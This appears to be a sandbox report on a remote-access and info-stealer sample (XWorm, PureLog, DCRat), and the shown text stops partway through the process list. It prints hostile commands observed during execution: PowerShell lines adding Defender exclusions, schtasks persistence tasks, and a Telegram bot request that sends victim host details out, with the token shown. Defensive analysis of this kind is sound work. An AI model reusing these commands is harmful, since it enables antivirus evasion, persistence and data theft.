                                                                                            Jan 7, 2025 18:02:08.593575001 CET1.1.1.1192.168.2.70x7935No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                            Jan 7, 2025 18:03:13.078114033 CET1.1.1.1192.168.2.70xe3e1No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                            Jan 7, 2025 18:04:26.711690903 CET1.1.1.1192.168.2.70x5c87No error (0)122295cm.n9shteam.in104.21.48.1A (IP address)IN (0x0001)false
                                                                                            Jan 7, 2025 18:04:26.711690903 CET1.1.1.1192.168.2.70x5c87No error (0)122295cm.n9shteam.in104.21.32.1A (IP address)IN (0x0001)false
                                                                                            Jan 7, 2025 18:04:26.711690903 CET1.1.1.1192.168.2.70x5c87No error (0)122295cm.n9shteam.in104.21.112.1A (IP address)IN (0x0001)false
                                                                                            Jan 7, 2025 18:04:26.711690903 CET1.1.1.1192.168.2.70x5c87No error (0)122295cm.n9shteam.in104.21.64.1A (IP address)IN (0x0001)false
                                                                                            Jan 7, 2025 18:04:26.711690903 CET1.1.1.1192.168.2.70x5c87No error (0)122295cm.n9shteam.in104.21.80.1A (IP address)IN (0x0001)false
                                                                                            Jan 7, 2025 18:04:26.711690903 CET1.1.1.1192.168.2.70x5c87No error (0)122295cm.n9shteam.in104.21.16.1A (IP address)IN (0x0001)false
                                                                                            Jan 7, 2025 18:04:26.711690903 CET1.1.1.1192.168.2.70x5c87No error (0)122295cm.n9shteam.in104.21.96.1A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • api.telegram.org
                                                                                            • ip-api.com

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.749699208.95.112.180720C:\Users\user\Desktop\HaLCYOFjMN.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 7, 2025 18:02:08.604635954 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                            Host: ip-api.com
                                                                                            Connection: Keep-Alive
                                                                                            Jan 7, 2025 18:02:09.077702045 CET175INHTTP/1.1 200 OK
                                                                                            Date: Tue, 07 Jan 2025 17:02:08 GMT
                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                            Content-Length: 6
                                                                                            Access-Control-Allow-Origin: *
                                                                                            X-Ttl: 60
                                                                                            X-Rl: 44
                                                                                            Data Raw: 66 61 6c 73 65 0a
                                                                                            Data Ascii: false


                                                                                            HTTPS Proxied Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.749975149.154.167.220443720C:\Users\user\Desktop\HaLCYOFjMN.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-07 17:03:13 UTC446OUTGET /bot7568949165:AAGgQ5jLJjKDrnOV8dm-jnLIdWR-IOeUVTQ/sendMessage?chat_id=7733551555&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A23A5CC5CF533B5EED372%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ST_D6%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20nursultan HTTP/1.1
                                                                                            Host: api.telegram.org
                                                                                            Connection: Keep-Alive
                                                                                            2025-01-07 17:03:14 UTC347INHTTP/1.1 401 Unauthorized
                                                                                            Server: nginx/1.18.0
                                                                                            Date: Tue, 07 Jan 2025 17:03:13 GMT
                                                                                            Content-Type: application/json
                                                                                            Content-Length: 58
                                                                                            Connection: close
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                            2025-01-07 17:03:14 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                            Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:5
                                                                                            Start time:12:02:03
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Users\user\Desktop\HaLCYOFjMN.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\Desktop\HaLCYOFjMN.exe"
                                                                                            Imagebase:0x200000
                                                                                            File size:75'264 bytes
                                                                                            MD5 hash:3C30D3B3706B97A2A0638180BB159B44
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmp, Author: ditekSHen
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.2734936969.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.2734936969.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:8
                                                                                            Start time:12:02:07
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe'
                                                                                            Imagebase:0x150000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:9
                                                                                            Start time:12:02:07
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:11
                                                                                            Start time:12:02:14
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'HaLCYOFjMN.exe'
                                                                                            Imagebase:0x7ff741d30000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:12
                                                                                            Start time:12:02:14
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:14
                                                                                            Start time:13:13:58
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Update.exe'
                                                                                            Imagebase:0x7ff741d30000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:15
                                                                                            Start time:13:13:58
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:16
                                                                                            Start time:13:14:17
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'
                                                                                            Imagebase:0x7ff741d30000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:17
                                                                                            Start time:13:14:17
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:20
                                                                                            Start time:13:14:41
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\user\AppData\Roaming\Update.exe"
                                                                                            Imagebase:0x7ff7068d0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:21
                                                                                            Start time:13:14:41
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:22
                                                                                            Start time:13:14:42
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Users\user\AppData\Roaming\Update.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Users\user\AppData\Roaming\Update.exe
                                                                                            Imagebase:0x180000
                                                                                            File size:75'264 bytes
                                                                                            MD5 hash:3C30D3B3706B97A2A0638180BB159B44
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:23
                                                                                            Start time:13:14:53
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Users\user\AppData\Roaming\Update.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Update.exe"
                                                                                            Imagebase:0xbb0000
                                                                                            File size:75'264 bytes
                                                                                            MD5 hash:3C30D3B3706B97A2A0638180BB159B44
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:24
                                                                                            Start time:13:14:54
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Users\user\AppData\Local\Temp\rqbprm.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\rqbprm.exe"
                                                                                            Imagebase:0xc60000
                                                                                            File size:2'705'596 bytes
                                                                                            MD5 hash:693F4A6FC50DDA899DE3F006DE04951E
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000003.2089903896.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000018.00000003.2090975716.000000000736E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\rqbprm.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\rqbprm.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 74%, ReversingLabs
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:25
                                                                                            Start time:13:14:54
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Users\user\AppData\Local\Temp\cnvwov.EXE
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\cnvwov.EXE"
                                                                                            Imagebase:0x6c0000
                                                                                            File size:550'912 bytes
                                                                                            MD5 hash:F50B390915773B882776BB3EF569C708
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 68%, ReversingLabs
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:26
                                                                                            Start time:13:14:54
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:27
                                                                                            Start time:13:14:55
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\agentwebreviewDhcp\uk12ZF.vbe"
                                                                                            Imagebase:0xe10000
                                                                                            File size:147'456 bytes
                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:28
                                                                                            Start time:13:14:55
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                            Imagebase:0x7ff7b4ee0000
                                                                                            File size:55'320 bytes
                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:29
                                                                                            Start time:13:15:01
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Users\user\AppData\Roaming\Update.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Users\user\AppData\Roaming\Update.exe
                                                                                            Imagebase:0x1b0000
                                                                                            File size:75'264 bytes
                                                                                            MD5 hash:3C30D3B3706B97A2A0638180BB159B44
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:30
                                                                                            Start time:13:15:02
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Users\user\AppData\Roaming\Update.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Update.exe"
                                                                                            Imagebase:0x1e0000
                                                                                            File size:75'264 bytes
                                                                                            MD5 hash:3C30D3B3706B97A2A0638180BB159B44
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:31
                                                                                            Start time:13:15:19
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\agentwebreviewDhcp\fSi1yDkwZTtB7t90YnI.bat" "
                                                                                            Imagebase:0x410000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:32
                                                                                            Start time:13:15:19
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:33
                                                                                            Start time:13:15:19
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\agentwebreviewDhcp/portBrowserweb.exe"
                                                                                            Imagebase:0x3e0000
                                                                                            File size:2'383'872 bytes
                                                                                            MD5 hash:943D7E982E4BAB5A7CA659DC390E9A79
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000021.00000000.2338852988.00000000003E2000.00000002.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.2642036068.0000000012B3B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\agentwebreviewDhcp\portBrowserweb.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\agentwebreviewDhcp\portBrowserweb.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 65%, ReversingLabs
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:34
                                                                                            Start time:13:15:22
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Mail\System.exe'" /f
                                                                                            Imagebase:0x7ff7068d0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:35
                                                                                            Start time:13:15:23
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\System.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff7068d0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:36
                                                                                            Start time:13:15:23
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Mail\System.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff7068d0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:37
                                                                                            Start time:13:15:23
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline"
                                                                                            Imagebase:0x7ff7ceb40000
                                                                                            File size:2'759'232 bytes
                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:38
                                                                                            Start time:13:15:23
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:40
                                                                                            Start time:13:15:23
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES158C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2AA2F9313E4148E19DA14C63DF3823B.TMP"
                                                                                            Imagebase:0x7ff7734f0000
                                                                                            File size:52'744 bytes
                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:41
                                                                                            Start time:13:15:24
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Program Files\Windows Mail\System.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Windows Mail\System.exe"
                                                                                            Imagebase:0x140000
                                                                                            File size:2'383'872 bytes
                                                                                            MD5 hash:943D7E982E4BAB5A7CA659DC390E9A79
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Mail\System.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Mail\System.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Mail\System.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Mail\System.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 65%, ReversingLabs
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:42
                                                                                            Start time:13:15:24
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Program Files\Windows Mail\System.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Windows Mail\System.exe"
                                                                                            Imagebase:0xf70000
                                                                                            File size:2'383'872 bytes
                                                                                            MD5 hash:943D7E982E4BAB5A7CA659DC390E9A79
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:43
                                                                                            Start time:13:15:24
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.cmdline"
                                                                                            Imagebase:0x7ff7ceb40000
                                                                                            File size:2'759'232 bytes
                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:44
                                                                                            Start time:13:15:24
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:45
                                                                                            Start time:13:15:24
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1BB6.tmp" "c:\Users\user\AppData\Roaming\CSC2223B829CAD74E6CA36F406352D1401D.TMP"
                                                                                            Imagebase:0x7ff7734f0000
                                                                                            File size:52'744 bytes
                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:46
                                                                                            Start time:13:15:25
                                                                                            Start date:07/01/2025
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.cmdline"
